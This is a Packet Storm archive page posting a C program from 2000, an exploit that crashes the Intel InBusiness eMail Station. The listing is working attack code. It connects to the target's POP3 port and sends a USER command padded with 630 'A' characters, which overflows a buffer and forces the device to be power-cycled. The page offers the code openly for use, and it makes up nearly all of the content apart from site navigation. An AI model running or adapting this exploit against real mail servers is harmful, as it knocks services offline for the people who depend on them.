exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

inbusdos.c

inbusdos.c
Posted Oct 27, 2000
Authored by Incubus | Site securax.org

Denial of Service attack against an Intel InBusiness eMail Station. Will send a 630 char buffer to the pop server as argument of a USER command. The little box needs to be "powered off" and -on again.

tags | exploit, denial of service
SHA-256 | 097d217d961c8d8bf396fe40cca2df3a255ed805abb39c1fe873baf76da9a46a

inbusdos.c

Change Mirror Download

/*
* intel InBusiness eMail Station DoS
*
* Errr... Denial Of Service against that little black intel box
* by incubus <incubus@securax.org>
*
* Respect: securax, hackschool, shelloracle, tessa, kim,
* glyc, splat, lamagra and steven.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

void usage(char *proggie){
fprintf (stderr, "Intel InBusiness eMail Station Denial of Service\n");
fprintf (stderr, "do %s mail.server.com\n", proggie);
fprintf (stderr, "mail.server.com must be an InBusiness eMail Station\n\n");
exit(-1);
}

int main(int argc, char **argv){
char buf[636];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2) usage(argv[0]);
fprintf (stdout, "Intel InBusiness eMail Station Denial of Service\n");
fprintf (stdout, "by incubus <incubus@securax.org>\n\n");
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){ herror("Error"); exit(-1); }
name.sin_family=AF_INET; name.sin_port=htons(110);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0) { herror("Oops"); exit(-1); }
if (sock < 0){ herror("Oops"); exit(-1); }
strncpy(buf, "user ", 5);
for (i=0; i<630; i++) strncat(buf, "A", 1);
send(sock, buf, sizeof(buf), 0);
close(sock);
fprintf (stdout, "Denial of Service done\n\n");
close(sock);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close